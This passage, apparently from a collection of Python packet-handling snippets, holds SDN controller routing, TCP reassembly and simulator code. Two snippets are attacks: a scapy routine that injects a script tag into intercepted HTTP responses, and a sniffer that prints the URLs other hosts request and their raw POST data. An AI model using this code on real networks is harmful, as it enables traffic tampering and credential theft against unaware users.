IP\n #\n # TODO : At this point only ARPs belonging to the APNs networks subnet should\n # be answered\n if match['eth_type'] == 0x0806 and match['arp_op'] == 2:\n LOG.debug('TUNNEL MNGR: ARP response with target APN discovery IP recieved at controller, processing for APN extraction')\n pkt = packet.Packet(array.array('B', ev.msg.data))\n arp_pkt=pkt.get_protocol(arp.arp)\n apn_ip = arp_pkt.src_ip\n apn_mac= arp_pkt.src_mac\n port = match['in_port']\n\n ##Search for apn in APN_POOL to add mac addr. and update topology\n for sApn in APN_POOL:\n if sApn.ip_addr == apn_ip:\n LOG.debug('Recieved ARP response was from ' + sApn.name + ' APN')\n sApn.eth_addr = apn_mac\n sApn.port = port\n sApn.dpid = dp.id\n # Links towards APNs will not be measured\n topo.add_link(dp.id,str(sApn.name),port)\n topo.add_link(str(sApn.name),dp.id,0)\n topo.reload_topology()\n LOG.debug('TUNNEL MNGR: APN '+str(sApn.name)+' found at forwarder: '+str(dp.id)+', port: '+str(port) + ' by ARP search')\n\n ##Add special rules to edge forwarder\n self.on_edge_inet_dp_join(dp, port, sApn)\n\n # FIX: We do not handle bss as a special APN\n # For greater extensibility, BSS/UTRAN/LAN APNs (exit/enter) points\n # will be handled in a generic manner\n #\n ##Create MAC-tunnels between APN and all BSSs\n #for bss in BSS_POOL:\n # self.add_tunnel(bss,apn)\n #break\n\n ### WMNC: In this case, we are not making tunnels between\n # two types of ingress/egress point, but actually same type\n\n for dApn in APN_POOL:\n # we are cycling through all possible APNs, looking for different APN tupples\n # with filled HW addresses (already found by APN search)\n if sApn != dApn and dApn.eth_addr != None:\n LOG.debug('TUNNEL MNGR: Different APNs with filled HW address found, lets find out if there is tunnel between them')\n\n paths = False\n try:\n paths = nx.all_simple_paths(topo.DynamicGraph, source=sApn.name, target=dApn.name)\n except:\n LOG.debug('TUNNEL MNGR: No path between: ' + sApn.name + ' and ' + dApn.name + '. Retry when next APN discovered.')\n\n LOG.debug('TUNNEL MNGR: These are the paths between them (possible tunnels):')\n if paths:\n for path in paths:\n LOG.debug('TUNNEL MNGR: Calling add_plainMacTunnel for ' + sApn.name + ' and ' + dApn.name + ' with path: ' + str(path))\n self.add_plainMacTunnel(sApn, dApn, path)\n else:\n LOG.debug('TUNNEL MNGR: PATHS == 0 ????????????????')\n\n\n return\n\n ##ICMP echo with dst_ip==DISCOVERY_IP_DST recieved - new link between forwarders is up\n if match['eth_type'] == 0x0800 and match['ipv4_dst'] == DISCOVERY_IP_DST and match['ip_proto'] == 1:\n #LOG.debug('TOPO MNGR: ICMP echo recieved at controller, processing for link extraction or latency measurement')\n\n pkt = packet.Packet(array.array('B', ev.msg.data))\n\n ##Discovery pings carry information about sending datapath in payload of icmp packet\n ##these information are in Dictionary format, we parse the out with _icmp_parse_payload() method\n body = _icmp_parse_payload(pkt)\n neighbourDPID=body['dpid']\n neighbourPort=body['port_out']\n\n ## measurement\n ## currentClock moved way up to improve precision\n receivedClock=float(body['clock'])\n currentClock = time.clock()\n latency = currentClock - receivedClock\n\n currentDate = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n ##Update latency or add new edges to topology.\n if topo.DynamicGraph.has_edge(dp.id, neighbourDPID) and topo.DynamicGraph.has_edge(neighbourDPID, dp.id):\n topo.StaticGraph[neighbourDPID][dp.id]['pdv'] = topo.StaticGraph[neighbourDPID][dp.id]['lat'] - latency\n topo.StaticGraph[neighbourDPID][dp.id]['lat'] = latency\n topo.StaticGraph[neighbourDPID][dp.id]['upt'] = currentDate\n #topo.StaticGraph[neighbourDPID][dp.id]['upt'] = currentDate\n loss = self.loss_update(neighbourDPID, dp.id, currentDate)\n #LOG.debug('TOPO MNGR: Updating latency ' + str(latency) + ' and date ' + str(currentDate) + ' LOSS: ' + str(loss))\n topo.reload_topology()\n else:\n ## latency not correct for both directions when adding links\n ## update occurs on receive of next measurement packet from oposite direction\n topo.add_link(dp.id, neighbourDPID, ev.msg.match['in_port'], latency, currentDate)\n topo.add_link(neighbourDPID, dp.id, neighbourPort , latency, currentDate)\n LOG.debug('TOPO MNGR: Topology changed: New link between forwarder ID '+str(dp.id)+ ' via port ' + str(ev.msg.match['in_port'])\n +' and forwarder ID '+str(neighbourDPID)+ ' via port ' + str(neighbourPort) + ' was discovered.')\n\n topo.reload_topology()\n ## retry to create tunnels\n ## find better paths between APNs\n for sApn in APN_POOL:\n for dApn in APN_POOL:\n if sApn != dApn:\n LOG.debug('TOPO MNGR: Topology changed: trying to re-build inactive tunnel between:' + sApn.name + ' and ' + dApn.name)\n paths = False\n try:\n paths = nx.all_simple_paths(topo.DynamicGraph, source=sApn.name, target=dApn.name)\n except:\n LOG.debug('No path between: ' + sApn.name + ' and ' + dApn.name + '. Retry when next fwd connects.')\n\n LOG.debug('TUNNEL MNGR: These are the paths between them (possible tunnels):')\n if paths:\n for path in paths:\n LOG.debug('TUNNEL MNGR: Calling add_plainMacTunnel for ' + sApn.name + ' and ' + dApn.name + ' with path: ' + str(path))\n self.add_plainMacTunnel(sApn, dApn, path)\n else:\n LOG.debug('TUNNEL MNGR: PATHS == 0 ????????????????')\n return\n\n # flow of last resort (process for routing)\n if match['eth_type'] == 0x0800:\n # LOG.debug('*****************Flow of last resort matched(plain IP), process for routing********'\n # + ' match[ipv4_dst]: ' + str(match['ipv4_dst'] + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(match['ip_dscp'])))\n ## Not very proud of myself, but it will do the trick\n ## Turbo lumberjack routing logic\n ## TODO: Implement a longest prefix match routing\n\n candidates = []\n\n for source, destination, ip_dscp in routesList:\n if ((source == match['ipv4_dst'] and destination == match['ipv4_src']) or (source == match['ipv4_src'] and destination == match['ipv4_dst'])) and ip_dscp == match['ip_dscp']:\n # LOG.debug('ROUTING: route source: ' + str(source) + 'destination: ' + str(destination)\n # + ' match[ipv4_dst]: ' + str(match['ipv4_dst'])\n # + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(ip_dscp)\n # + ' already exists, aborting addition of new route')\n return\n\n for tunnel in TUNNELS:\n if (tunnel.sApn.ip_addr == match['ipv4_dst'] and tunnel.dApn.ip_addr == match['ipv4_src']) or (tunnel.sApn.ip_addr == match['ipv4_src'] and tunnel.dApn.ip_addr == match['ipv4_dst']):\n LOG.debug('ROUTING: Tunnel candidate found in list of tunnels. Adding tunnel path: ' + str(tunnel.po_edges) + ' to candidates.')\n candidates.append(tunnel)\n\n trafficClass = self.TC_selection(match['ip_dscp'])\n\n if len(candidates) == 0:\n LOG.debug('ROUTING: match[ipv4_dst]: ' + str(match['ipv4_dst'])\n + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(match['ip_dscp']))\n LOG.debug('ROUTING: ERROR, NO feasible tunnels for such route.')\n return\n\n LOG.debug('Looking for tunnels: DST_IP: ' + match['ipv4_dst'] + ' SRC_IP: ' + match['ipv4_src'] + ' DSCP: ' + str(match['ip_dscp']) + '(traffic class: ' + str(trafficClass) + ')' + ' Incoming from FWD: ' + str(dp.id))\n tunnel = self.tunnel_selection(trafficClass, candidates)\n LOG.debug('TE MNGR: Selected tunnel Path out: ' + str(tunnel.path_out_str) + ' meter_id: ' + str(tunnel.meter_id))\n\n dscp = match['ip_dscp']\n\n ## meter_id\n ## 2,4,6,8,10 = 500kbps, 1,3,5,7,9 = 1000kbps ...\n ## 0 = 100Gbps\n meter_id = tunnel.meter_id\n\n #\n # FIXME: incomplete set of rules installed on LAN Access forwarders\n # TODO : Philosophy of table IDs should be clarified, as now it total mess!!!\n # TODO : this should be done only once, from that moment, all user plane packets\n # should travelse only forwarder and should not be sent to controller\n\n\n\n #WAY OUT\n dp = dpset.get(tunnel.sApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_type=0x0800, ipv4_dst=tunnel.dApn.ip_addr, ip_dscp=dscp)\n actions = [parser.OFPActionSetField(eth_src=tunnel.tid_in), parser.OFPActionSetField(eth_dst=tunnel.tid_out)]\n inst = [parser.OFPInstructionGotoTable(MAC_TUNNEL_TABLE), parser.OFPInstructionMeter(meter_id), parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=100, match=match, instructions=inst, table_id=INGRESS_TABLE)\n dp.send_msg(req)\n\n LOG.debug('ROUTING: Installing flow ON WAY OUT to forwarderID: ' + str(dp.id) + ',Table: ' + str(INGRESS_TABLE) + ' DP ID: ' + str(tunnel.dApn.dpid) + ' Tunel dApn IP addr: ' + str(tunnel.dApn.ip_addr) + ' Tunnel ID: ' + str(tunnel.tid_out))\n\n dp = dpset.get(tunnel.dApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_dst=tunnel.tid_out)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.dApn.eth_addr), parser.OFPActionOutput(tunnel.path_out[-1].port_out)]\n inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=300, match=match, instructions=inst, table_id=ACCESS_ADAPTATION_TABLE_OUT)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY OUT to forwarderID: ' + str(dp.id) + ',Table: ' + str(ACCESS_ADAPTATION_TABLE_OUT) + ' DP ID: ' + str(tunnel.dApn.dpid)+ ' Tunel ID: ' + str(tunnel.tid_out)+ ' dApn ETH addr: ' + str(tunnel.dApn.eth_addr))\n\n #WAY IN\n dp = dpset.get(tunnel.dApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_type=0x0800, ipv4_dst=tunnel.sApn.ip_addr, ip_dscp=dscp)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.tid_in), parser.OFPActionSetField(eth_src=tunnel.tid_out)]\n inst = [parser.OFPInstructionGotoTable(MAC_TUNNEL_TABLE), parser.OFPInstructionMeter(meter_id), parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=100, match=match, instructions=inst, table_id = INGRESS_TABLE)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY IN to forwarderID: ' + str(dp.id) + ',Table: ' + str(INGRESS_TABLE) + ' DP ID: ' + str(tunnel.sApn.dpid) + ' Tunel dApn IP addr: ' + str(tunnel.sApn.ip_addr) + ' Tunnel ID: ' + str(tunnel.tid_in))\n\n\n dp = dpset.get(tunnel.sApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_dst=tunnel.tid_in)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.sApn.eth_addr), parser.OFPActionOutput(tunnel.path_in[-1].port_out)]\n inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=300, match=match, instructions=inst, table_id=ACCESS_ADAPTATION_TABLE_OUT)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY IN to forwarderID: ' + str(dp.id) + ',Table: ' + str(ACCESS_ADAPTATION_TABLE_OUT) + ' DP ID: ' + str(tunnel.sApn.dpid)+ ' Tunel ID: ' + str(tunnel.tid_in)+ ' sApn ETH addr: ' + str(tunnel.sApn.eth_addr))\n\n\n LOG.debug('ROUTING: Rules on access edge forwarders installed')\n LOG.debug('ROUTING: Adding route: DST_IP: ' + tunnel.dApn.ip_addr + ' SRC_IP: ' + tunnel.sApn.ip_addr + ' dscp: ' + str(dscp) + ' path out str: ' + tunnel.path_out_str )\n routesList.append( ( tunnel.sApn.ip_addr, tunnel.dApn.ip_addr, dscp) )\n\n parser = dp.ofproto_parser\n\n for dpid in LAN_TYPE_FORWARDERS:\n ## DUNNO why this rule with low priority still hits traffic which is also matched by rules with IP address matches\n ## Here I delete the rule, it is added on FWD when it connects to controoller\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dpid) + ' is a LAN edge forwarder, deleting rules')\n dp = dpset.get(dpid)\n priority = 2\n match = parser.OFPMatch(eth_type=0x0800)\n actions = [parser.OFPActionOutput(ofp.OFPP_CONTROLLER)]\n self.mod_flow(dp, command=dp.ofproto.OFPFC_DELETE_STRICT,\n table_id=0, actions=actions,\n match=match, priority=priority)\n\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dp.id) + ' is a LAN edge forwarder, installing rules again :)')\n match = parser.OFPMatch(eth_type=0x0800)\n actions = [parser.OFPActionOutput(ofp.OFPP_CONTROLLER)]\n self.add_flow(dp, 2, match, actions)", "def handle_packet(self, packet):\n raise serial.threaded.NotImplementedError(\n 'please implement functionality in handle_packet')", "def _process_packet(node: int, packet: Packet, system: System, params: Params,\n records: Records):\n time_now = system.time\n packet.arrived[node] = time_now\n\n # If server is ready, start serving. Otherwise, push the packet into\n # the queue. If the queue was full, mark the packet is being dropped\n # for further analysis.\n server = system.get_server(node)\n queue = system.get_queue(node)\n if server.ready:\n # start serving immediately\n server.serve(packet)\n packet.service_started[node] = time_now\n system.schedule(Event.SERVICE_END, params.services[node](), node)\n records.get_system_size(node).add(time_now, system.get_size(node))\n\n elif queue.push(packet):\n # packet was queued\n records.get_system_size(node).add(time_now, system.get_size(node))\n\n else:\n # mark packet as being dropped\n packet.was_dropped = True\n packet.drop_node = node\n packet.drop_time = time_now", "def __packetHandler(self, hdr, data):\n\t\tif self.quit: raise SystemExit('capture on interface stoped.')\n\n\t\tdecoded_data = self.decoder.decode(data)\n\t\t(src, dst, data) = self.__getHeaderInfo(decoded_data)\n\t\tfor item in regex_links.finditer(str(data)):\n\t\t\tif not item: continue\n\t\t\t#pos = item.start()\n\t\t\tlink = item.groups()[0]\n\t\t\t#self.buffer.append( (link,) )\n\t\t\tself.buffer.append( (link,src,dst,) )\t# append to internal buffer", "def callback(self, packet, sender=None):\n pass", "def post_process(self, packet: 'dict[str, Any]') -> 'MPTCP':\n ret = self.data\n\n ret.option = Enum_Option.Multipath_TCP\n ret.length = self.test['length']\n ret.subtype = Enum_MPTCPOption.get(packet['test']['subtype'])\n\n return ret", "def PacketFromReceiver(self, packet):\n # TODO: Implement TCP here.\n pass", "def callback(self, packet):\n\n\t\tsrc = packet[IP].src\n\t\tdst = packet[IP].dst\n\n\t\tif TCP in packet:\n\t\t\tsrc_port = packet[TCP].sport\n\t\t\tdst_port = packet[TCP].dport\n\t\telif UDP in packet:\n\t\t\tsrc_port = packet[UDP].sport\n\t\t\tdst_port = packet[UDP].dport\n\t\telse:\n\t\t\tsrc_port = \"other\"\n\t\t\tdst_port = \"other\"\n\n\t\tdata = src + \":\" + str(src_port) + \"-\" + dst + \":\" + str(dst_port)\n\t\tdata = self.padding(data)\n\t\tsock.send(data.encode())", "def process(self):\n fp = open(self.pcap, \"rb\")\n pkts = dpkt.pcap.Reader(fp)\n if self.sip and self.dip and self.sp and self.dp:\n self.process_pkts(pkts)", "def handle_packet_received(self, packet):\r\n log.debug(packet)\r\n self._process_packet(packet)\r\n self.emit(packet.fctype, packet)\r\n self.emit(FCTYPE.ANY, packet)", "def process_packet(packet):\n if packet.haslayer(HTTPRequest):\n # if this packet is an HTTP Request\n # get the requested URL\n url = packet[HTTPRequest].Host.decode() + packet[HTTPRequest].Path.decode()\n # get the requester's IP Address\n ip = packet[IP].src\n # get the request method\n method = packet[HTTPRequest].Method.decode()\n print(\"\\n{GREEN}[+] \", ip, \"Requested \", url, \" with \", method)\n if show_raw and packet.haslayer(Raw) and method == \"POST\":\n # if show_raw flag is enabled, has raw data, and the requested method is \"POST\"\n # then show raw\n print(\"\\n{RED}[*] Some useful Raw data: \", packet[Raw].load)", "def packet_in_handler(self, ev):\n msg = ev.msg\n datapath = msg.datapath\n port = msg.match['in_port']\n gateway = self.gateway_get(datapath.id)\n\n if gateway is None:# or gateway.idc_id != CONF.idc_id:\n return\n\n pkt = packet.Packet(msg.data)\n pkt_ethernet = pkt.get_protocol(ethernet.ethernet)\n\n if not pkt_ethernet:\n LOG.info(_LI(\"drop non-ethernet packet\"))\n return\n\n pkt_arp = pkt.get_protocol(arp.arp)\n pkt_ipv4 = pkt.get_protocol(ipv4.ipv4)\n\n if pkt_arp:\n self.packet_arp.run(msg, pkt_ethernet, pkt_arp, gateway)\n elif pkt_ipv4:\n pkt_tp = pkt.get_protocol(tcp.tcp) or \\\n pkt.get_protocol(udp.udp) or \\\n pkt.get_protocol(icmp.icmp)\n\n if pkt.get_protocol(icmp.icmp):\n LOG.error(\"packet-in msg %s %s %s from %s\", datapath.id, pkt_ipv4, pkt_tp, port)\n LOG.debug(\"packet-in msg %s %s %s from %s\", \n datapath.id, pkt_ipv4, pkt_tp, port)\n\n if pkt_tp and port:\n self.packet_ipv4.run(msg, pkt_ethernet, pkt_ipv4, pkt_tp, gateway)\n else:\n LOG.debug(_LI(\"drop non-arp and non-ip packet\"))", "def process_packet(self, packet, udp_dport=UDP_INT_DST_PORT):\n return", "def process_packet(packet):\n scapy_packet = scapy.IP(packet.get_payload())\n print(\"[+] Processing Packet...\")\n if scapy_packet.haslayer(scapy.Raw):\n load = scapy_packet[scapy.Raw].load\n if scapy_packet[scapy.TCP].dport == 80:\n print(\"[+] Request !!!!!\")\n if \"Accept-Encoding:\" in load:\n load = re.sub(\"Accept-Encoding:.*?\\\\r\\\\n\",\"\",load)\n elif scapy_packet[scapy.TCP].sport == 80:\n print(\"[+] Response !!!!!\")\n injection_code = \"<script>alert('Shubhi');</script>\"\n load = scapy_packet[scapy.Raw].load.replace(\"</body>\",injection_code+\"</body>\")\n content_length_search = re.search(\"(?:Content-Length:\\s)(\\d*)\",load)\n if content_length_search:\n content_length = content_length_search.group(1)\n new_content_length = int(content_length)+len(injection_code)\n load = load.replace(content_length,str(new_content_length))\n if load!=scapy_packet[scapy.Raw].load:\n scapy_packet = set_load(scapy_packet, load)\n packet.set_payload(str(scapy_packet))\n scapy_packet.show()\n packet.accept()", "def _handle_PacketIn (self, event):\n packet = event.parsed # This is the parsed packet data.\n if not packet.parsed:\n log.warning(\"Ignoring incomplete packet\")\n return\n\n packet_in = event.ofp # The actual ofp_packet_in message.\n self.do_final(packet, packet_in, event.port, event.dpid)", "def handle_packet(self, packet, ip_proto=None):\n logger.info('Packet data - [%s]', packet.summary())\n return False", "def callback(self, pkt):\n if ARP in pkt:\n self.parse_ip(pkt.sprintf(\"%ARP.psrc%\"))\n if TCP in pkt or UDP in pkt:\n self.parse_ip(pkt.sprintf(\"%IP.src%\"))\n self.parse_ip(pkt.sprintf(\"%IP.dst%\"))", "def handle_packet(self, packet):\n if not self.__validate_received_packet(packet):\n return\n packet_type = packet.get_type()\n log(f'Packet of type {packet_type.name} received.')\n if self.reunion_mode == ReunionMode.FAILED:\n if packet_type == PacketType.ADVERTISE:\n self.__handle_advertise_packet(packet)\n return\n if packet_type == PacketType.MESSAGE:\n self.__handle_message_packet(packet)\n elif packet_type == PacketType.ADVERTISE:\n self.__handle_advertise_packet(packet)\n elif packet_type == PacketType.JOIN:\n self.__handle_join_packet(packet)\n elif packet_type == PacketType.REGISTER:\n self.__handle_register_packet(packet)\n elif packet_type == PacketType.REUNION:\n self.__handle_reunion_packet(packet)", "def post_process(self, packet: 'dict[str, Any]') -> 'SMFDPDOption':\n ret = self.data\n return ret", "def handle_packet(self, srcif, packet) -> bool:\n typeOfPacket = packet[\"type\"]\n if typeOfPacket == DATA:\n return self.forward(srcif, packet)\n elif typeOfPacket == DUMP:\n return self.dump(packet)\n elif typeOfPacket == UPDT:\n return self.update(srcif, packet)\n elif typeOfPacket == RVKE:\n return self.revoke(packet)\n else:\n return False", "def SendPacketToReceiver(self, packet):\n self.network_simulator.SendToReceiver(packet)", "def _process(self, buf, ts=None, pkt_num=None):\n\n if not buf:\n return\n self.pkt_num = pkt_num\n eth = dpkt.ethernet.Ethernet(buf)\n ip = eth.data\n tcp = ip.data\n sip = inet_to_str(ip.src)\n dip = inet_to_str(ip.dst)\n fin_flag = tcp.flags & 0x001\n ack_flag = tcp.flags & 0x010\n syn_flag = tcp.flags & 0x002\n rst_flag = tcp.flags & 0x004\n syn_unacceptable_states = [TCPState.ESTABLISHED, TCPState.FIN_WAIT_1, TCPState.FIN_WAIT_2,\n TCPState.CLOSING, TCPState.LAST_ACK]\n data_acceptable_states = [TCPState.ESTABLISHED, TCPState.CLOSE_WAIT]\n tcp_opts = dpkt.tcp.parse_opts(tcp.opts) if tcp.opts else None\n tcp_opts = tcp_opts_tuple_list_to_dict(tcp_opts) if tcp_opts else None\n num_pkt_session_pkt = len(self.sessions[self.session_count]) if self.session_count else 0\n\n # Only Window size can change in ACKs (in other words - after SYNs), nothing else like - window-scaling, or\n # MSS, or Selective-SYN can't be changed. If present in options after SYN, should be ignored in my opinion\n # https://superuser.com/questions/966212/does-the-sequence-number-of-tcp-packet-headers-wrap-around\n # TODO: seq number in coming packet is ahead of the expected one, then it should be held for processing\n\n def slide_window():\n\n if len(self.sessions[self.session_count]):\n if sip == self.sip:\n if self._s_mss != -1 and get_tcp_packet_payload_len_with_options(eth) > self._s_mss:\n return\n prev_ip = dpkt.ethernet.Ethernet(self.get_last_c_pkt()).data\n rcv_nxt = self._s_rcv_next\n win_left_end = self._s_win_left_edge\n early_pkts = self._s_early_pkts\n other_end_win_size = self._s_win_size\n current_state = self._c_state\n else:\n if self._c_mss != -1 and get_tcp_packet_payload_len_with_options(ip) > self._c_mss:\n return\n prev_ip = dpkt.ethernet.Ethernet(self.get_last_s_pkt()).data\n rcv_nxt = self._c_rcv_next\n win_left_end = self._c_win_left_edge\n early_pkts = self._c_early_pkts\n other_end_win_size = self._c_win_size\n current_state = self._s_state\n if self._print_debug_info:\n logger.debug(self.client_server_next_rcv(), tcp_pkt_debug_info(ip))\n prev_tcp = prev_ip.data\n prev_tcp_data_offset = prev_tcp.off * 4\n prev_ip_header_len = prev_ip.hl * 4\n prev_tcp_payload_len = prev_ip.len - (prev_tcp_data_offset + prev_ip_header_len)\n tcp_payload_len = get_tcp_packet_payload_len(ip)\n if (tcp_seq_number_in_window(win_left_end, tcp.seq, other_end_win_size) or\n tcp_seq_number_in_window(win_left_end,\n inc_tcp_seq_number(tcp.seq, tcp_payload_len), other_end_win_size)):\n if inc_tcp_seq_number(tcp.seq, tcp_payload_len) == rcv_nxt:\n \"\"\"\n \n Since there is no new payload sent, just store the tcp packet with empty payload.\n This is going to increase the packet count but not going to add duplicated data\n in session data, by session data here it means actual data sent (after discarding\n the retransmission) to application layer. To do that - we will empty out the payload,\n if packets has some, then add the packet to the session, else add the empty packet as it is\n to the session. This logic will easily handle the TCP connections supporting\n TCP Timestamp options describe in https://tools.ietf.org/html/rfc1323\n \n \"\"\"\n # one case is when seq number is < rcv_nxt but sender want to ack more data\n # which means it is sending the same data again but its acking more received content\n \"\"\"\n 1. packet has Data\n a. prev_packet has data\n A. header change (change cur packet and change previous packet) add to list\n B. no header change retransmission ( sum check)\n b. prev_packete has no data\n A. header change (change cur packet only) add to list\n B. no header change retransmission (change cur packet only)\n 2. packet has no data\n a. prev_packet has data\n A. header change (change previous packet only) add to list\n B. no header change (change previous packet only)\n b. prev_packet has no data\n A. header change (sum check) add to list\n B. no header change retransmission (sum check)\n \"\"\"\n if prev_tcp.sum == tcp.sum:\n cur_sum = tcp_shasum_calc(ip.src, ip.dst, ip.p, ip.data.pack())\n prev_sum = tcp_shasum_calc(prev_ip.src, prev_ip.dst, prev_ip.p, prev_ip.data.pack())\n if cur_sum == prev_sum:\n # covers 1.a.B and 2.b.B\n return\n\n empty_prev_ip = copy.deepcopy(prev_ip)\n empty_prev_tcp = empty_prev_ip.data\n empty_prev_tcp.seq = rcv_nxt\n empty_prev_ip.len -= prev_tcp_payload_len\n empty_prev_tcp.data = b\"\"\n empty_prev_ip = tcp_fix_checksum(empty_prev_ip)\n new_part_ip = copy.deepcopy(ip)\n new_part_tcp = new_part_ip.data\n new_part_tcp.data = b\"\"\n new_part_tcp.seq = rcv_nxt\n new_part_ip.len -= tcp_payload_len\n new_part_ip.sum = 0\n new_part_tcp.sum = 0\n new_part_ip = tcp_fix_checksum(new_part_ip)\n eth.data = new_part_ip\n cur_pkt = eth.pack()\n new_pkt = dpkt.ethernet.Ethernet(cur_pkt)\n new_part_ip = new_pkt.data\n new_part_tcp = new_part_ip.data\n\n \"\"\"\n Checksum comparision logic is kept to discard the straight duplicates packets\n without Timestamp Options. These kind of packet will not serve any purposes.\n If removal of these checksum comparison code blocks felt necessary, it could\n be removed -- that will add few extra retransmitted packets -- but that would\n also requrie to update the testcases built around this code blocks.\n \"\"\"\n if new_part_tcp.sum == empty_prev_tcp.sum:\n # covers 1.b.B\n # covers case 2.a.B\n if tcp_shasum_calc(ip.src, ip.dst, ip.p, ip.data.pack()) == tcp_shasum_calc(\n prev_ip.src, prev_ip.dst, prev_ip.p, empty_prev_ip.data.pack()):\n return\n \"\"\"\n needs to added to list under cases 2.a.A, 2.b.A, 1.a.A and 1.b.A\n cur_pkt is updated earlier\n \"\"\"\n if sip == self.sip:\n if inc_tcp_seq_number(self._c_rcv_next, 1) <= new_part_tcp.ack:\n self._c_rcv_next = new_part_tcp.ack\n else:\n if inc_tcp_seq_number(self._s_rcv_next, 1) <= new_part_tcp.ack:\n self._s_rcv_next = new_part_tcp.ack\n elif (current_state in data_acceptable_states and\n tcp_seq_number_in_window(tcp.seq, rcv_nxt, tcp_payload_len)):\n stale_data_len = seq_numbers_diff(tcp.seq, rcv_nxt)\n win_right_end = inc_tcp_seq_number(win_left_end, other_end_win_size)\n if tcp_seq_number_in_window(rcv_nxt, inc_tcp_seq_number(tcp.seq, tcp_payload_len),\n seq_numbers_diff(rcv_nxt, win_right_end)):\n tcp.data = tcp.data[stale_data_len:]\n else:\n allowed_payload_size = seq_numbers_diff(rcv_nxt, win_right_end)\n remaining_eth = dpkt.ethernet.Ethernet(eth.pack())\n #remaining_ip = eth.data\n #remaining_tcp = remaining_ip.data\n remaining_eth.data.data.seq = inc_tcp_seq_number(tcp.seq, stale_data_len + allowed_payload_size)\n remaining_eth.data.data.data = tcp.data[stale_data_len + allowed_payload_size:]\n remaining_eth.data.len -= stale_data_len + allowed_payload_size\n remaining_eth.data = tcp_fix_checksum(remaining_eth.data)\n #remaining_eth.data = remaining_ip\n tcp.data = tcp.data[stale_data_len: stale_data_len + allowed_payload_size]\n if self.sip == sip:\n self._s_early_pkts.append(((ts, self.pkt_num), remaining_eth.pack()))\n else:\n self._c_early_pkts.append(((ts, self.pkt_num), remaining_eth.pack()))\n tcp.sum = 0\n # ip.len -= stale_data_len\n tcp.seq = rcv_nxt\n ip.data = tcp\n ip.sum = 0\n eth.data = ip\n cur_pkt = eth.pack()\n if sip == self.sip:\n self._s_rcv_next = inc_tcp_seq_number(self._s_rcv_next,\n (ip.len - (ip.hl * 4 + tcp.off * 4)))\n else:\n self._c_rcv_next = inc_tcp_seq_number(self._c_rcv_next,\n (ip.len - (ip.hl * 4 + tcp.off * 4)))\n elif (current_state in data_acceptable_states and\n tcp_seq_number_in_window(rcv_nxt, tcp.seq, other_end_win_size)):\n # hold it for further processing\n if self.sip == sip:\n self._s_early_pkts.append(((ts, self.pkt_num), buf))\n else:\n self._c_early_pkts.append(((ts, self.pkt_num), buf))\n return\n else:\n return\n self.sessions[self.session_count].append(((ts, self.pkt_num), cur_pkt))\n # as this packet is accepted, might need to update the rwnd size and left end of rwnd\n if sip == self.sip:\n self._c_payload_size += len(eth.data.data.data)\n logger.debug(\"Client send data size: {}. Accepted data size is: {}.\"\n \" Total data sent from client is: {}\".format(\n len(tcp.data), len(eth.data.data.data), self._c_payload_size))\n self._c_prev_pkt_ind = len(self.sessions[self.session_count]) - 1\n rcv_nxt = self._s_rcv_next\n if (not tcp.ack == self._c_win_left_edge and\n tcp_seq_number_in_window(inc_tcp_seq_number(self._c_win_left_edge, 1),\n tcp.ack, self._c_win_size)):\n self._c_win_left_edge = tcp.ack\n self._c_win_size = tcp.win << self._c_win_scaling_factor\n else:\n self._s_payload_size += len(eth.data.data.data)\n logger.debug(\"Server send data of size: {}. Accepted data size is: {}.\"\n \" Total data sent from server is: {}\".format(\n len(tcp.data), len(eth.data.data.data), self._s_payload_size))\n self._s_prev_pkt_ind = len(self.sessions[self.session_count]) - 1\n rcv_nxt = self._c_rcv_next\n # left edge is incremented by one becuase in_window function checks for inclusive seq number\n # starting at left edge but ACK tells what's the next expected seq number, which could be 1 next\n # to the end of window\n if (not tcp.ack == self._s_win_left_edge and\n tcp_seq_number_in_window(inc_tcp_seq_number(self._s_win_left_edge, 1),\n tcp.ack, self._s_win_size)):\n self._s_win_left_edge = tcp.ack\n self._s_win_size = tcp.win << self._s_win_scaling_factor\n # check if packet at the head of queue is ready to be processed\n while True:\n if len(early_pkts) == 0:\n break\n (_ts, _pkt_num), _buf = early_pkts.popleft()\n early_eth = dpkt.ethernet.Ethernet(_buf)\n early_ip = early_eth.data\n early_tcp = early_ip.data\n if tcp_seq_number_in_window(early_tcp.seq, rcv_nxt, get_tcp_packet_payload_len(early_ip)):\n # if early_tcp.seq <= rcv_nxt:\n self._process(early_eth.pack(), _ts, _pkt_num)\n else:\n early_pkts.appendleft(((_ts, _pkt_num), early_eth.pack()))\n break\n\n \"\"\"\n TCP flags:0x000 (12 bits)\n [11 10 9 8 7 6 5 4 3 2 1 0]\n - Bit 11 10 9: reserved\n - Bit 8: nonce\n - Bit 7: CWR (Congestion window reduced)\n - Bit 6: ECN-Echo (Explicit Congestion Notification)\n - Bit 5: Urgent\n - Bit 4: ACK\n - Bit 3: Push\n - Bit 2: Reset\n - Bit 1: SYN\n - Bit 0: FIN\n \"\"\"\n\n \"\"\"TCP 